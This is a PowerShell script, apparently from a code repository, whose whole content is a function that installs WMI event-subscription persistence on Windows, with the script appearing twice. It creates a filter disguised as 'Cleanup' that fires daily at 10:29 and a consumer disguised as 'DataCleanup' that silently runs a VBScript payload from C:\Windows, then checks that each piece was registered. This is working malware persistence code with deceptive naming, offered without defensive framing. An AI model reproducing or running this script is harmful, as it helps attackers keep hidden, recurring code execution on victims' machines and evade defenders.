bkr32/NT.ps1

## NT.ps1
function Install-Persistence{
    $EventFilterName = 'Cleanup'
    $EventConsumerName = 'DataCleanup'
    $finalPayload = "C:\Windows\System32\WScript.exe /NoLogo /B C:\Windows\winx64.vbs"

    # Create event filter
    $EventFilterArgs = @{
        EventNamespace = 'root/cimv2'
        Name = $EventFilterName
        Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 10 AND TargetInstance.Minute = 29 GROUP WITHIN 60 "
        QueryLanguage = 'WQL'
    }

    $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs

    # Create CommandLineEventConsumer
    $CommandLineConsumerArgs = @{
        Name = $EventConsumerName
        CommandLineTemplate = $finalPayload
    }
    $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs

    # Create FilterToConsumerBinding
    $FilterToConsumerArgs = @{
        Filter = $Filter
        Consumer = $Consumer
    }
    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs

    #Confirm the Event Filter was created
    $EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
    if ($EventCheck -ne $null) {
        Write-Host "Event Filter $EventFilterName successfully written to host"
    }

    #Confirm the Event Consumer was created
    $ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    if ($ConsumerCheck -ne $null) {
        Write-Host "Event Consumer $EventConsumerName successfully written to host"
    }

    #Confirm the FiltertoConsumer was created
    $BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'"""
    if ($BindingCheck -ne $null){
        Write-Host "Filter To Consumer Binding successfully written to host"
    }

}

Install-Persistence
	function Install-Persistence{
	$EventFilterName = 'Cleanup'
	$EventConsumerName = 'DataCleanup'
	$finalPayload = "C:\Windows\System32\WScript.exe /NoLogo /B C:\Windows\winx64.vbs"

	# Create event filter
	$EventFilterArgs = @{
	EventNamespace = 'root/cimv2'
	Name = $EventFilterName
	Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 10 AND TargetInstance.Minute = 29 GROUP WITHIN 60 "
	QueryLanguage = 'WQL'
	}

	$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs

	# Create CommandLineEventConsumer
	$CommandLineConsumerArgs = @{
	Name = $EventConsumerName
	CommandLineTemplate = $finalPayload
	}
	$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs

	# Create FilterToConsumerBinding
	$FilterToConsumerArgs = @{
	Filter = $Filter
	Consumer = $Consumer
	}
	$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs

	#Confirm the Event Filter was created
	$EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
	if ($EventCheck -ne $null) {
	Write-Host "Event Filter $EventFilterName successfully written to host"
	}

	#Confirm the Event Consumer was created
	$ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
	if ($ConsumerCheck -ne $null) {
	Write-Host "Event Consumer $EventConsumerName successfully written to host"
	}

	#Confirm the FiltertoConsumer was created
	$BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'"""
	if ($BindingCheck -ne $null){
	Write-Host "Filter To Consumer Binding successfully written to host"
	}

	}

	Install-Persistence